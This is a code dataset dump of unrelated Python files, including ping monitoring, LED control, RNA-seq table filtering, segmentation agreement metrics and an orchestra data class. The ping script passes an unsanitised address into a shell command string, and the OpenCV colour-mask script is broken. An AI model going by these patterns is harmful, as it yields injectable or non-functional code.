md.syntax = syntax\n insn = list(md.disasm(code, address))[0]\n output = \"%s %s\" % (insn.mnemonic, insn.op_str)\n print(output)\n if output != expected_output:\n print(\"\\t --> ERROR: expected output = %s\" %(expected_output))\n\n print()\n\n\nif __name__ == '__main__':\n test_regression()\n","sub_path":"suite/regress.py","file_name":"regress.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650822139","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n\r\n\"\"\"Usage:\r\n ping [ --sip= ] [ --count= ] [ --step= ] \r\n ping (-h | --help)\r\nOptions:\r\n -h --help Show this screen.\r\n\"\"\"\r\n\r\nimport time, commands, re\r\nfrom datetime import datetime\r\nfrom docopt import docopt\r\nfrom updateInfluxdb import UpdateDB\r\n\r\n\r\nclass Requirements(object):\r\n def __init__(self, dip, sip):\r\n super(Requirements, self).__init__()\r\n self.dip = dip\r\n self.sip = sip\r\n\r\n def ping(self):\r\n if self.sip == None:\r\n (status, output) = commands.getstatusoutput(\"ping -q -s 996 -W 1 -c 10 -i 0.5 {0}\".format(self.dip))\r\n else:\r\n (status, output) = commands.getstatusoutput(\"ping -q -s 996 -W 1 -c 10 -i 0.5 {0} -I {1}\".format(self.dip, self.sip))\r\n primary_ip = re.search(r'(?P\\d+\\.\\d+\\.\\d+\\.\\d+)', output).group()\r\n loss = re.findall(r'(?P\\d+)%', output)\r\n maximum = re.findall(r'rtt\\smin/avg/max/mdev\\s=\\s\\d+\\.\\d+\\/\\d+.\\d+\\/(?P\\d+.\\d+)\\/\\d+.\\d+\\sms', output)\r\n info = {'PRIMARY_IP': primary_ip,\r\n 'LOSS': int(loss[0]),\r\n 'MAX': float(maximum[0]) if maximum else -1.0,\r\n }\r\n return info\r\n\r\ndef pinget(**kwargs):\r\n dip, sip = kwargs['dip'], kwargs['sip']\r\n p = Requirements(dip, sip)\r\n info = p.ping()\r\n return info\r\n\r\ndef updatedb(info):\r\n (status, output) = commands.getstatusoutput(\"hostname\")\r\n tags = {'PRIMARY_IP': info['PRIMARY_IP'],\r\n 'description': info['description'],\r\n 'type': 'ping',\r\n 'sip': info['sip'],\r\n }\r\n fields = {'LOSS': info['LOSS'],\r\n 'MAX': info['MAX'],\r\n }\r\n kwargs = {'measurement': output,\r\n 'tag': tags,\r\n 'fields': fields,\r\n 'timestamp': info['timestamp'],\r\n }\r\n UpdateDB(**kwargs)\r\n\r\ndef main():\r\n args = docopt(__doc__, version='download 1.0')\r\n kwargs = {'dip': args[''],\r\n 'sip': args['--sip'],\r\n }\r\n # 以下为本地转为UTC时间\r\n timestamp = datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n info = pinget(**kwargs)\r\n info['timestamp'] = timestamp\r\n info['description'] = args['']\r\n info['sip'] = args['--sip'] if args['--sip'] else 'localhost'\r\n updatedb(info)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"32895837","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport signal\n\nfrom cytoolz.itertoolz import groupby\n\nfrom bndl.compute.run import create_ctx\nfrom bndl.compute.worker import many_argparser\nfrom bndl.util.exceptions import catch\nfrom bndl.util.funcs import identity\nfrom bndl.util.threads import dump_threads\nimport bndl\n\n\nHEADER = r''' ___ _ _ ___ _\nWelcome | _ ) \\| | \\| |\nto the | _ \\ .` | |) | |__\n |___/_|\\_|___/|____| shell.\n\nRunning BNDL version %s.\nComputeContext available as ctx.''' % bndl.__version__\n\n\nargparser = argparse.ArgumentParser(parents=[many_argparser])\nargparser.prog = 'bndl.compute.shell'\nargparser.add_argument('--worker-count', nargs='?', type=int, default=None, dest='worker_count',\n help='The number of BNDL workers to start (defaults to 0 if seeds is set).')\nargparser.add_argument('--conf', nargs='*', default=(),\n help='BNDL configuration in \"key=value\" format')\n\n\ndef main():\n signal.signal(signal.SIGUSR1, dump_threads)\n\n try:\n args = argparser.parse_args()\n config = bndl.conf\n\n if args.listen_addresses:\n config['bndl.net.listen_addresses'] = args.listen_addresses\n if args.seeds:\n config['bndl.net.seeds'] = args.seeds\n config['bndl.compute.worker_count'] = 0\n if args.worker_count is not None:\n config['bndl.compute.worker_count'] = args.worker_count\n\n config['bndl.run.numactl'] = args.numactl\n config['bndl.run.pincore'] = args.pincore\n config['bndl.run.jemalloc'] = args.jemalloc\n\n config.update(*args.conf)\n\n ctx = create_ctx(config)\n ns = dict(ctx=ctx)\n\n if config['bndl.net.seeds'] or config['bndl.compute.worker_count'] != 0:\n print('Connecting with workers ...', end='\\r')\n worker_count = ctx.await_workers(args.worker_count)\n node_count = len(groupby(identity, [tuple(sorted(worker.ip_addresses())) for worker in ctx.workers]))\n header = HEADER + '\\nConnected with %r workers on %r nodes.' % (worker_count, node_count)\n else:\n header = HEADER\n\n try:\n import IPython\n IPython.embed(header=header, user_ns=ns)\n except ImportError:\n import code\n code.interact(header, local=ns)\n finally:\n with catch():\n ctx.stop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bndl/compute/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546011274","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\ndef fadeFlashLed(led):\n\tfor i in range(0, 100, 2):\n\t\tled.ChangeDutyCycle(i)\n\t\ttime.sleep(0.01)\n\n\tfor i in range(100, 0, -2):\n\t\tled.ChangeDutyCycle(i)\n\t\ttime.sleep(0.01)\n\nled = 4\n\nGPIO.setup(led, GPIO.OUT)\n\nlight = GPIO.PWM(led, 50)\nlight.start(0)\n\nfor i in range(0, 5):\n\tfadeFlashLed(light)\n\nlight.stop()\nGPIO.cleanup()","sub_path":"Python/GPIO/fadeFlashLed.py","file_name":"fadeFlashLed.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"502218791","text":"#!/usr/bin/env python3\n\nimport sys\nfrom subprocess import Popen, PIPE\n\n# `git status --porcelain --branch` can collect all information\n# branch, remote_branch, untracked, staged, changed, conflicts, ahead, behind\npo = Popen(['git', 'status', '--porcelain', '--branch'], stdout=PIPE, stderr=PIPE)\nstdout, sterr = po.communicate()\n\ngit=\"0\"\nbranch=\"none\"\ndirty=\"0\"\nif po.returncode == 0:\n git = \"1\"\n lines = stdout.decode('utf-8').splitlines()\n s = lines[0]\n start = s.index(' ')\n branch = 'ERROR'\n if '.' in s:\n branch = s[s.index(' ')+1:s.index('.')]\n else:\n branch = s[s.index(' ')+1:]\n\n dirty = \"0\"\n if len(lines) > 1: dirty = \"1\"\n\nout = ' '.join([git, branch, dirty])\nprint(out, end='')\n","sub_path":"custom/plugins/git-prompt-custom/gitstatus.py","file_name":"gitstatus.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"611582615","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\nWrite a program to find the n-th ugly number.\n\nUgly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 1, 2, 3, 4, 5, 6, 8, 9, 10, 12 is the sequence of the first 10 ugly numbers.\n\nNote that 1 is typically treated as an ugly number.\n\"\"\"\n\nclass Solution(object):\n def nthUglyNumber(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n result = [1]\n mul2 = mul3 = mul5 = 0\n for _ in xrange(n - 1):\n minVal = min(result[mul2] * 2, result[mul3] * 3, result[mul5] * 5)\n result.append(minVal)\n if minVal == result[mul2] * 2:\n mul2 += 1\n if minVal == result[mul3] * 3:\n mul3 += 1\n if minVal == result[mul5] * 5:\n mul5 += 1\n return result[-1]\n","sub_path":"Python/264-UglyNumber2/nthUglyNumber.py","file_name":"nthUglyNumber.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476828287","text":"##############################################################################################\n# Description: Creates a new sampletable.txt for differential expression analysis which\n#\t\tis necessary because a user may remove samples from their groups.tab file\n#\t\tafter running QC. The new sampletable.txt file is created from the\n#\t\tgroups.tab file that is provided when running DE half of the pipeline.\n#\t\tAlso a corresponding RawCounts_RSEM_genes.txt file is created which only\n#\t\tcontains information for samples that that are specificed in groups.tab.\n#\t\tThis file is written to DEG_{group1}-{group2}_{mincpm}_{minsample} folder.\n#\t\tIt is necessary that the order of the groups listed in sampletable.txt and\n#\t\tand RawCounts_RSEM_genes_filtered.txt match. If they do not the reported\n#\t\tdirection (sign: postive or negative) of each gene's fold-change will be\n#\t\topposite of what it should be. This program also addresses that problem.\n# USAGE:\tpython filterSampleTable.py -s 'rbfoxKO_1,rbfoxKO_2,control_1,control_2'\\\n#\t\t\t\t\t -g 'KO,KO,WT,WT' -l 'KO_1,KO_2,WT_1,WT_2' \\\n#\t\t\t\t\t -r 'RawCountFile_RSEM_genes.txt' \\\n#\t\t\t\t\t -outsample 'outfolder/sampletable.txt'\\\n#\t\t\t\t\t -outraw 'outfolder/RawCountFile_RSEM_genes.txt'\n##############################################################################################\n\nfrom __future__ import print_function, division\nimport os, sys\nimport argparse # module load python/3.5\n\n\n\n\ndef filteredRawCounts(rawcountsfilename, samples, outrawfilename):\n\t'''Generator that yields rawcounts information for samples in the current DEG groups.tab file.\n\tHelper function checks formating of the headers between the newly generated sampletable.txt and\n\tinput RawCounts_RSEM_genes.txt file. If the order of groups formatting differs, it fixes it to match\n\tthe ordering in sampletable.txt (fail-safe to ensure later referential integrity at DE).\n\t'''\n\tdef formatted(headerlist, samples, linelist):\n\t\theaderIndexes = {}\n\t\tsymbol = linelist[0]\n\t\t# Create Dictionary for mapping samplename in header of RawCounts_RSEM_genes.txt to its position \n\t\tfor i in range(len(headerlist)):\n\t\t\theaderIndexes[headerlist[i]] = i\n\t\tindexlist = []\n\t\tformattedlist = [symbol]\n\t\tfor sample in samples:\n\t\t\ttry:\n\t\t\t\tindexlist.append(headerIndexes[sample])\n\t\t\t\tformattedlist.append(linelist[headerIndexes[sample]])\n\t\t\texcept KeyError:\n\t\t\t\traise Exception('Key Error: Failed to find sample {} in RawCounts_RSEM_genes.txt.\\nDid you add an additional sample to groups.tab?'.format(sample))\n\t\treturn formattedlist\n\n\trawfh = open(rawcountsfilename, 'r')\n\theaderlist = [ fn.split('/')[-1].split('.')[0] for fn in next(rawfh).strip().split('\\t')]\n\n\tnewheader = '\\t'.join([headerlist[0]]+ samples) + '\\n'\n\tprint(newheader)\n\toutfh = open(outrawfilename, 'w')\n\toutfh.write(newheader)\n\tfor line in rawfh:\n\t\tlinelist = line.strip().split('\\t')\n\t\tformattedlist = formatted(headerlist, samples, linelist)\n\t\t#print(formattedlist)\n\t\toutfh.write('\\t'.join(formattedlist) + '\\n')\n\trawfh.close()\n\toutfh.close()\n\ndef SampleTable(samples, groups, labels,contrasts):\n\t'''Generator that yields sample, group, and label info from the current DEG groups.tab file'''\n\tfor i in range(len(samples)):\n\t\tif groups[i] in contrasts:\n\t\t\tyield samples[i], groups[i], labels[i]\n\n\n\nif __name__ == '__main__':\n\n\t# USAGE: python filterSampleTable.py -c 'KO WT' -s 'rbfoxKO_1,rbfoxKO_2,rbfoxKO_3,control_1,control_2,control_3' -g 'KO,KO,KO,WT,WT,WT' -l 'KO_1,KO_2,KO_3,WT_1,WT_2,WT_3' -r 'RawCountFile_RSEM_genes.txt' -outsample 'outfolder/sampletable.txt' -outraw 'outfolder/RawCountFile_RSEM_genes.txt'\n\t# Parse Command-line arguments\n\tparser = argparse.ArgumentParser(description='Filters sampletable.txt, cannot always use the sampletable that is generated in QC, sometimes DE is run with less samples.')\n\tparser.add_argument('-r','--inputRawCounts', type=str, required=True, help='Input RawCounts_RSEM_genes.txt file that is generated QC: (required)')\n\tparser.add_argument('-outraw','--outputRawCounts', type=str, required=True, help='Output RawCounts_RSEM_genes.txt filename (required)')\n\tparser.add_argument('-outsample','--outputSampleTable', type=str, required=True, help='Output RawCounts_RSEM_genes.txt filename (required)')\n\tparser.add_argument('-s','--samples', type=str, required=True, help='samples string from the run.json file (required)')\n\tparser.add_argument('-c','--contrast', type=str, required=True, help='contrast string (required)')\n\tparser.add_argument('-g','--groups', type=str, required=True, help='groups string from the run.json file (required)')\n\tparser.add_argument('-l','--labels', type=str, required=True, help='labels string from the run.json file (required)')\n\targs = parser.parse_args()\n\n\tsampleslist = args.samples.split(',')\n\tgroupslist = args.groups.split(',')\n\tlabelslist = args.labels.split(',')\n\tcontrastlist = args.contrast.split(' ')\n\tprint(sampleslist)\n\tprint(groupslist)\n\tprint(labelslist)\n\n\n\t#Creating the new sampletable.txt file based off of the current DEG groups.tab information\n\tsamptablefh = open(args.outputSampleTable, 'w')\n\tsamptablefh.write('sampleName\\tfileName\\tcondition\\tlabel\\n')\n\tsamplesincontrast = []\n\tgroupset = []\n\tfor sample, group, label in SampleTable(sampleslist, groupslist, labelslist, contrastlist):\n\t\tprint('{0}\\t{0}\\t{1}\\t{2}'.format(sample, group, label))\n\t\tsamplesincontrast.append(sample)\n\t\tgroupset.append(group)\n\t\tsamptablefh.write('{0}\\t{0}\\t{1}\\t{2}\\n'.format(sample, group, label))\n\tsamptablefh.close()\n\n\tif len(set(groupset)) < 2:\n\t\traise Exception('Error in groups.tab file. Contrast does not contain two groups!')\n\n\t#Creating new RawCounts_RSEM_genes.txt file based off of the current DEG groups.tab information\n\trawfn = args.inputRawCounts\n\toutrawfn = args.outputRawCounts\n\tfilteredRawCounts(rawfn, samplesincontrast, outrawfn)\n\n\n","sub_path":"Results-template/Scripts/filterSampleTable.py","file_name":"filterSampleTable.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587004571","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\n\nwhile(1):\n\n # Take each frame\n frame = cap.read()\n frame2 = frame.clone()\n frame3 = frame.clone()\n\n # Convert BGR to HSV\n hsv_blue = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n hsv_green = hsv.clone() \n\n # define range of blue color in HSV\n lower_blue = np.array([110,50,50])\n upper_blue = np.array([130,255,255])\n\n # define range of blue color in HSV\n lower_green = np.array([50, 100, 100])\n upper_green = np.array([70, 255, 255])\n\n # Threshold the HSV image to get only blue colors\n mask_blue = cv2.inRange(hsv_blue, lower_blue, upper_blue)\n mask_green = cv2.inRange(hsv_green, lower_green, upper_green)\n\n # Bitwise-AND mask and original image\n res = cv2.bitwise_and(frame, frame, mask_blue)\n res2 = cv2.bitwise_and(frame2, frame2, mask_green)\n\n cv2.imshow('frame_blue',frame)\n cv2.imshow('mask_blue',mask_blue)\n cv2.imshow('res_blue',res)\n\n cv2.imshow('frame_green',frame2)\n cv2.imshow('mask_green',mask_green)\n cv2.imshow('res_green',res2)\n\n k = cv2.waitKey(5) & 0xFF\n if k == 27:\n break\n\ncv2.destroyAllWindows()\n","sub_path":"imgpros_multicolor_new.py","file_name":"imgpros_multicolor_new.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"613791791","text":"'''\nThis module contains implementations of Scott's and Fleiss' Pi, adapted in\n[FournierInkpen2012]_ for segmentation (in as similar a manner as [Hearst1997]_)\nusing the formulation of Kappa provided in [ArtsteinPoesio2008]_.\n\nPi's general form could be described, as it is in [ArtsteinPoesio2008]_, in \nterms of actual agreement (:math:`\\\\text{A}_a`) and expected agreement \n(:math:`\\\\text{A}_e`) as:\n\n.. math::\n \\pi,\\pi^* = \\\\frac{\\\\text{A}_a-\\\\text{A}_e}{1 \\\n - \\\\text{A}_e}\n\n:math:`\\pi` represents Scott's Pi (for 2 coders), whereas :math:`\\pi^*`\nrepresents its generalization to more than 2 coders. Each metric calculates\n:math:`\\\\text{A}_a` using :func:`segeval.agreement.actual_agreement` and\nonly varies the calculation of :math:`\\\\text{A}_e`.\n\n\n.. moduleauthor:: Chris Fournier \n'''\n#===============================================================================\n# Copyright (c) 2011-2012, Chris Fournier\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author nor the names of its contributors may\n# be used to endorse or promote products derived from this software\n# without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#===============================================================================\nfrom decimal import Decimal\nfrom . import actual_agreement\nfrom .. import compute_mean, compute_mean_values, create_tsv_rows\nfrom ..data import load_file\nfrom ..data.TSV import write_tsv\nfrom ..data.Display import render_value, render_mean_values\n\n\ndef scotts_pi(items_masses, return_parts=False):\n '''\n Calculates Scott's Pi, originally proposed in [Scott1955]_, for\n segmentations. Adapted in [FournierInkpen2012]_ from the formulations\n provided in [Hearst1997]_ and [ArtsteinPoesio2008]_'s formulation for\n expected agreement:\n \n .. math::\n \\\\text{A}^\\pi_e = \\sum_{k \\in K} \\\\big(\\\\text{P}^\\pi_e(k)\\\\big)^2\n \n .. math::\n \\\\text{P}^\\pi_e(\\\\text{seg}_t) = \n \\\\frac{\n \\sum_{c \\in C}\\sum_{i \\in I}|\\\\text{boundaries}(t, s_{ic})|\n }{\n \\\\textbf{c} \\cdot \\sum_{i \\in I} \\\\big( \\\\text{mass}(i) - 1 \\\\big)\n }\n \n :param items_masses: Segmentation masses for a collection of items where \\\n each item is multiply coded (all coders code all items).\n :param return_parts: If true, return the numerator and denominator\n :type item_masses: dict\n :type return_parts: bool\n \n :returns: Scott's Pi\n :rtype: :class:`decimal.Decimal`\n \n .. seealso:: :func:`segeval.agreement.actual_agreement` for an example of\\\n ``items_masses``.\n \n .. note:: Applicable for only 2 coders.\n '''\n # Check that there are no more than 2 coders\n if len([True for coder_segs in items_masses.values() \\\n if len(coder_segs.keys()) > 2]) > 0:\n raise Exception('Unequal number of items specified.')\n # Check that there are an identical number of items\n num_items = len(items_masses.values()[0].keys())\n if len([True for coder_segs in items_masses.values() \\\n if len(coder_segs.values()) != num_items]) > 0:\n raise Exception('Unequal number of items contained.')\n # Return\n return fleiss_pi(items_masses, return_parts)\n\n\ndef fleiss_pi(items_masses, return_parts=False):\n '''\n Calculates Fleiss' Pi (or multi-Pi), originally proposed in [Fleiss1971]_,\n for segmentations (and described in [SiegelCastellan1988]_ as K).\n Adapted from the formulations\n provided in [Hearst1997]_ (p. 53) and [ArtsteinPoesio2008]_'s formulation\n for expected agreement:\n \n .. math::\n \\\\text{A}^{\\pi^*}_e = \\sum_{k \\in K} \\\\big(\\\\text{P}^\\pi_e(k)\\\\big)^2\n \n :param items_masses: Segmentation masses for a collection of items where \\\n each item is multiply coded (all coders code all items).\n :param return_parts: If true, return the numerator and denominator.\n :type items_masses: dict\n :type return_parts: bool\n \n :returns: Fleiss's Pi\n :rtype: :class:`decimal.Decimal`\n \n .. seealso:: :func:`segeval.agreement.actual_agreement` for an example of\\\n ``items_masses``.\n \n .. note:: Applicable for more than 2 coders.\n '''\n # pylint: disable=C0103,R0914\n # Check that there are an equal number of items for each coder\n num_items = len(items_masses.values()[0].keys())\n if len([True for coder_segs in items_masses.values() \\\n if len(coder_segs.values()) != num_items]) > 0:\n raise Exception('Unequal number of items contained.')\n # Initialize totals\n unmoved_masses, total_masses, coders_boundaries_totalboundaries = \\\n actual_agreement(items_masses)\n # Calculate Aa\n A_a = Decimal(sum(unmoved_masses)) / sum(total_masses)\n # Calculate Ae\n p_e_segs = list()\n for boundaries_info in coders_boundaries_totalboundaries.values():\n for item in boundaries_info:\n boundaries, total_boundaries = item\n p_e_seg = boundaries / total_boundaries\n p_e_segs.append(p_e_seg)\n # Calculate P_e_seg\n P_e_seg = Decimal(sum(p_e_segs)) / len(p_e_segs)\n A_e = (P_e_seg ** 2)\n # Calculate pi\n pi = (A_a - A_e) / (Decimal('1.0') - A_e)\n # Return\n if return_parts:\n return A_a, A_e\n else:\n return pi\n\n\ndef mean_fleiss_pi(dataset_masses):\n '''\n Calculate mean segmentation Fleiss' Pi.\n \n .. seealso:: :func:`fleiss_pi`, :func:`segeval.compute_mean`\n \n :param dataset_masses: Segmentation mass dataset (including multiple \\\n codings).\n :type dataset_masses: dict\n \n :returns: Mean, standard deviation, and variance.\n :rtype: :class:`decimal.Decimal`, :class:`decimal.Decimal`, :class:`decimal.Decimal`\n '''\n return compute_mean(dataset_masses, fleiss_pi)\n\n\nOUTPUT_NAME = 'S-based Fleiss\\' Multi Pi'\nSHORT_NAME = 'Pi*_s'\nSHORT_NAME_MEAN = 'Mean %s' % SHORT_NAME\n\n\ndef values_pi(dataset_masses):\n '''\n Produces a TSV for this metric\n '''\n header = list([SHORT_NAME])\n values = compute_mean_values(dataset_masses, fleiss_pi)\n return create_tsv_rows(header, values)\n\n\ndef parse(args):\n '''\n Parse this module's metric arguments and perform requested actions.\n '''\n output = None\n values, is_file = load_file(args)\n # Is a TSV requested?\n if args['output'] != None:\n # Create a TSV\n output_file = args['output'][0]\n header, rows = values_pi(values)\n write_tsv(output_file, header, rows)\n else:\n # Create a string to output\n if not args['output'] and is_file:\n # Render for one item\n output = render_value(SHORT_NAME, str(fleiss_pi(values)))\n else:\n # Render for one or more items\n mean, std, var, stderr = mean_fleiss_pi(values)\n output = render_mean_values(SHORT_NAME_MEAN, mean, std, var, stderr)\n # Return\n return output\n\n\ndef create_parser(subparsers):\n '''\n Setup a command line parser for this module's metric.\n '''\n from ..data import parser_add_file_support\n parser = subparsers.add_parser('pi',\n help=OUTPUT_NAME)\n parser_add_file_support(parser)\n parser.set_defaults(func=parse)\n\n","sub_path":"src/python/main/segeval/agreement/Pi.py","file_name":"Pi.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142220922","text":"from unittest import TestCase\r\nfrom random import randint\r\nfrom main import *\r\nfrom os import system\r\n\r\n#Класс дирижера:\r\nclass Conductor:\r\n conductors_number = 0 #Счетчик для id\r\n def __init__(self, Orchestra_id=None, Name=\"\", Sername=\"\", Middle_name=\"\", Salary=None, Orchestra_name=\"\"):\r\n self.conductor_id = Conductor.conductors_number\r\n Conductor.conductors_number+=1\r\n self.orchestra_id = Orchestra_id\r\n self.name = Name\r\n self.sername = Sername\r\n self.middle_name = Middle_name\r\n self.salary = Salary\r\n\r\n #Краткий вывод экземпляра:\r\n def show(self, Logic=True):\r\n line = self.name + \" \" + self.sername\r\n if Logic == True: print(line + \" (id = \" + str(self.conductor_id) + \", оркестр_id = \" + str(self.orchestra_id) + \")\", end=\"\")\r\n return line\r\n\r\n#Класс оркестра:\r\nclass Orchestra:\r\n orchestras_number = 0 #Счетчик для id\r\n def __init__(self, Name=\"\"):\r\n self.orchestra_id = Orchestra.orchestras_number\r\n Orchestra.orchestras_number+=1\r\n self.name = Name\r\n \r\n #Краткий вывод экземпляра:\r\n def show(self, Logic=True):\r\n line = \"\\\"\" +self.name + \"\\\"\"\r\n if Logic == True: print(line + \" (id = \" + str(self.orchestra_id) + \")\", end=\"\")\r\n return line\r\n\r\n#Класс дирижеров оркестров (для реализации связей и хранения данных):\r\nclass Storage:\r\n orchestras_dict = {} #Словарь относительно оркестров\r\n orchestras_list = [] #Cписки оркестров и дирижеров\r\n conductors_list = [] #\r\n\r\n def __init__(self):\r\n self.orchestras_dict = {}\r\n self.orchestras_list = []\r\n self.conductors_list = []\r\n Orchestra.orchestras_number = 0\r\n Conductor.conductors_number = 0\r\n\r\n #Добавление новых дирижеров:\r\n def add_conductor(self, Conductors, Orchestra_id):\r\n conductors_of_orchestra = self.orchestras_dict.get(Orchestra_id, None) #Поиск соответсвующего оркестра\r\n if conductors_of_orchestra != None: \r\n if isinstance(Conductors, list) == True: #Если такой имеется и соблюден синтаксис добавляем необходимых дирижеров\r\n for i in range(len(Conductors)): conductors_of_orchestra.append(Conductors[i].conductor_id) #в лист связей\r\n self.conductors_list.extend(Conductors) #в хранилище дирижеров\r\n else: print(\"Ошибка синтаксиса!\")\r\n else: print(\"Отсутсвует данный оркестр!\")\r\n\r\n #Добавление новых оркестров:\r\n def add_orchestra(self, Orchestras):\r\n if isinstance(Orchestras, list) == True:\r\n for i in range(len(Orchestras)): \r\n self.orchestras_dict[Orchestras[i].orchestra_id] = [] #в лист связей\r\n self.orchestras_list.extend(Orchestras) #в хранилище оркестров\r\n else: print(\"Ошибка синтаксиса!\")\r\n \r\n #Возвращение дирижера по id:\r\n def return_conductor_by_id(self, Conductor_id): \r\n try: return self.conductors_list[Conductor_id]\r\n except: return None\r\n\r\n #Возвращение id оркестра по его имени:\r\n def find_orcestra_by_name(Storage, Name):\r\n for i in range(len(Storage.orchestras_list)):\r\n if Storage.orchestras_list[i].name == Name: return i\r\n return None\r\n\r\n #Cоздание отсортированного по возрастанию списка средних зарплат в оркестрах:\r\n def count_average_salary(self):\r\n sallary_range_list = []\r\n for i in range(len(self.orchestras_dict)):\r\n summ = 0\r\n for i2 in range(len(self.orchestras_dict[i])): \r\n sallary = self.conductors_list[self.orchestras_dict[i][i2]].salary\r\n if sallary!= None:\r\n summ += sallary #Сумма месячных зарплат в этом оркестре\r\n length = len(self.orchestras_dict[i])\r\n if length>0:\r\n Averange = round(summ/length, 2) #Находим среднее\r\n else:\r\n Averange = 0\r\n sallary_range_list.append([Averange, i]) #Добавляем его соответсвенно с id оркестра\r\n sallary_range_list.sort()\r\n return sallary_range_list\r\n\r\n#================ТЕСТИРОВАНИЕ================\r\n#Класс, создающий случайные данные для испытаний:\r\nclass Init_Random_Storage(Storage):\r\n def init(self, number_conductores, number_orchestras, length_a, length_b, salary_a, salary_b):\r\n for i in range(number_orchestras):\r\n self.add_orchestra([Orchestra(self.get_rand_name(length_a, length_b))])\r\n\r\n for i in range(number_conductores):\r\n R = randint(0, number_orchestras-1)\r\n self.add_conductor([Conductor(R, self.get_rand_name(length_a, length_b), self.get_rand_name(length_a, length_b),\r\n self.get_rand_name(length_a, length_b), randint(salary_a, salary_b))], R)\r\n\r\n def get_rand_name(self, legth_a,length_b):\r\n Name = \"\"\r\n letters = \"абвгдежзийкльмнопрстуфцчшщъыьэюяАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\"\r\n length = randint(legth_a, length_b)\r\n for i in range(length):\r\n Name += letters[randint(0, 63)]\r\n return Name\r\n\r\n#Проверка функции подсчета среднего заработка:\r\nclass Test_of_count_average_salary(TestCase):\r\n def test_check(self, times=15):\r\n print(\"\\nПроверка функции подсчета среднего заработка: \", end=\"\")\r\n for i in range(times):\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 10, 15, 10000, 1000000)\r\n awarange_salary = S.count_average_salary()\r\n\r\n #Проверка порядка:\r\n m=0\r\n for i in awarange_salary:\r\n Test_of_count_average_salary.assertTrue(self, i[0]>=m)\r\n a=m\r\n\r\n #Проверка наличия:\r\n for i in range(0, len(S.orchestras_dict)-1):\r\n summ = 0;\r\n for i2 in range(len(S.orchestras_dict[i])): \r\n salary = S.conductors_list[S.orchestras_dict[i][i2]].salary\r\n if salary != None:\r\n summ += salary\r\n if len(S.orchestras_dict[i])>0: \r\n awarange = round(summ/len(S.orchestras_dict[i]), 2)\r\n else:\r\n awarange = 0\r\n Test_of_count_average_salary.assertIn(self, [awarange, i], awarange_salary) \r\n print(\"Оk\",end=\"\")\r\n\r\n#Проверка функции вывода среднего заработка:\r\nclass Test_of_show_middle_salary_list(TestCase):\r\n def test_check(self):\r\n print(\"\\nПроверка функции вывода среднего заработка: \", end=\"\")\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 10, 15, 10000, 1000000)\r\n average_salaries_list = S.count_average_salary() #Считается, что 